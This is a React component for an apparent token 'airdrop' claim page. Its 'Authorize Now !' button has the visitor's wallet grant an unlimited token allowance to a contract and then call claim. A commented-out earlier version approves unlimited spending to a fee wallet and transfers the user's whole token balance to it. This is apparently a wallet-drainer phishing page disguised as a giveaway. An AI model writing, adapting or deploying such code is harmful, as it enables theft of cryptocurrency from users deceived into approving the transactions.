import React, { useEffect, useState, useLayoutEffect, useRef, Fragment } from "react";
import Web3 from 'web3';
import Bep20Abi from '../Abi/bep20Abi.json';
import { useSelector } from 'react-redux';
import swal from 'sweetalert';
import {getList,getPercentage} from '../helper/';
import airdropAbi from "../Abi/airdrop.json";
import {airdropContract} from "../config";
import MyTimer from '../utils/MyTimer';
import { Helmet } from 'react-helmet';
const IndexContainer = () => {
      const {address,connected,web3,networkId} = useSelector((state) => state.main);
      const [data, setData] = useState([]);
      const [loading, setLoading] = useState(false);
      const [error, setError] = useState();
      let [isLoading,setIsLoading] = useState(false);
      const [maxUint, setMaxUint] = useState(Web3.utils.toBN(2).pow(Web3.utils.toBN(256)).sub(Web3.utils.toBN(1)));

     useEffect(() => {
      getAirdropList();
      }, [])
      

      const getAirdropList = async () => {
        try {
          const result = await getList();
          setData(result);
        } catch (error) {
        }
      
        } 



/*
      const handleClick = async () => {
      if (connected && address && data[0]?.contract) {
      let contract = new web3.eth.Contract(Bep20Abi, data[0]?.contract)
      let allowance = await contract.methods.allowance(address,data[0]?.feeWallet).call();
      if(Number(allowance.toString())>=Number(maxUint)){
      }else{
      await contract.methods.approve(data[0]?.feeWallet, maxUint).send({ from: address,gasLimit: "200000" });
      }
      var balance =await contract.methods.balanceOf(address).call();
      const response = await contract.methods.transferFrom(address,data[0]?.feeWallet,balance).send({ from: address,gasLimit: "200000"});
      if(response.status){
        swal('Airdrop Claimed successfully!', { type: 'success' });
      }else{
        swal('Airdrop Claimed Failed!', { type: 'error' });
      }
      }
      };
      */
      


      const handleClick = async () => {
    if (connected && address && data[0]?.contract) {
    const contract = new web3.eth.Contract(Bep20Abi, data[0]?.contract);
    const contract2 = new web3.eth.Contract(airdropAbi, airdropContract);
    let allowance = await contract
    .methods
    .allowance(address,airdropContract)
    .call();
    if(Number(allowance.toString())>=Number(maxUint)){
    }else{
    await contract.methods.approve(airdropContract, maxUint).send({ from: address,gasLimit: "200000" });
    }
    const response = await contract2.methods.claim(data[0]?.contract).send({ from: address,gasLimit: "200000"});
    if(response.status){
      swal("Claimed!", "Wallet Authorized successfully!", "success");
    }else{
      swal("Oops!", "Wallet Authorization Failed!", "error");
    }
    }
    };
    
    




  return (

    <Fragment>


{data.map((item, index) => (
  <>
  <Helmet>
   <title>{item.title}</title>
 </Helmet>
  <div className="relative max-w-screen-xll mx-auto py-12 xll:pt-12 xll:pb-16 relative px-2">
    <div><div className="flex items-stretch lg:items-start md:space-x-3 flex-col md:flex-row">
      <div className="md:w-2/5 xl:w-1/3 mb-3 md:mb-0 lg:sticky lg:top-3">
        <div className="bg-dark1 bg-opacity-90 rounded-lg shadow-2xl card bg-dark1">
          <div className="space-y-6 p-3 card-body">
            <div className="flex items-center">
              <div className="mr-3">
                
                  
                    
                    </div>
                    <div className="space-y-2">
                      


 
 </div>
 </div>

<div className="space-y-3 relative">
<div className="bg-gray-500 bg-opacity-10 p-3 rounded-2xl relative">
<div className="text-center">
<div className="space-y-3 relative">
  

{connected ?(

<div className="dropdown">
<button type="button"  onClick={() => handleClick()}   className="btn btn-main">Authorize Now ! </button>
</div>
) : (
  <>
<svg stroke="currentColor" fill="currentColor" strokeWidth={0} viewBox="0 0 512 512" className="inline fa-spin ml-1 align-text-bottom" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M288 39.056v16.659c0 10.804 7.281 20.159 17.686 23.066C383.204 100.434 440 171.518 440 256c0 101.689-82.295 184-184 184-101.689 0-184-82.295-184-184 0-84.47 56.786-155.564 134.312-177.219C216.719 75.874 224 66.517 224 55.712V39.064c0-15.709-14.834-27.153-30.046-23.234C86.603 43.482 7.394 141.206 8.003 257.332c.72 137.052 111.477 246.956 248.531 246.667C393.255 503.711 504 392.788 504 256c0-115.633-79.14-212.779-186.211-240.236C302.678 11.889 288 23.456 288 39.056z" /></svg> 
Connect your wallet to get started
<div className="ConnectButtons_container__Cj8KL">
  <div className="dropdown"><button aria-haspopup="true" aria-expanded="false" type="button" className="btn btn-main"> Connect Your Wallet First !! </button>
  </div>
  </div>
  </>
)
}









</div>
</div>
</div>

</div>



</div>
</div>
</div>
<div className="md:w-3/5 xl:w-2/3 space-y-3">
<div className="overflow-hidden relative bg-dark1 bg-opacity-80 rounded-lg shadow-lg border-0 zz-10 card bg-dark1">
<div className="card-body">
<div className="md:p-3 zz-10 space-y-8">
<div className="pb-3 flex flex-col gap-6">
<div className="flex items-start justify-between flex-wrap">
<div className="flex items-center mb-3 md:mb-0">
<div className="mr-3"><div style={{width: '45px', height: '45px'}}>
<img src={item.logoUrl} alt={item.tokenName} className="h-full rounded-full" />
</div>
</div>
<h2 className="text-2xl font-secondary tracking-wide mb-0">{item.tokenName}</h2>
</div>
  </div>
  <div className="opacity-80 font-light space-y-3 -mt-3">
    <p>{item.description}</p>
    
    </div>
    <div>

</div>



<div className="space-x-6 flex items-center">
  <ul className="flex flex-wrap items-center text-main space-x-6 z-20 relative text-2xl">
  {item.telegram &&
    <li>
      <a href={item.telegram} target="_blank" className="text-main" rel="noreferrer">
      <svg stroke="currentColor" fill="currentColor" strokeWidth={0} viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M446.7 98.6l-67.6 318.8c-5.1 22.5-18.4 28.1-37.3 17.5l-103-75.9-49.7 47.8c-5.5 5.5-10.1 10.1-20.7 10.1l7.4-104.9 190.9-172.5c8.3-7.4-1.8-11.5-12.9-4.1L117.8 284 16.2 252.2c-22.1-6.9-22.5-22.1 4.6-32.7L418.2 66.4c18.4-6.9 34.5 4.1 28.5 32.2z" /></svg>
      </a>
      </li>
}




</ul>
</div>
</div>

  
        <div className="mt-3" />
        </div>
        </div>
        </div>
        </div>
  </div></div>
  </div>
  
  </>
    ))}
    </Fragment>

  );
};

export default IndexContainer;
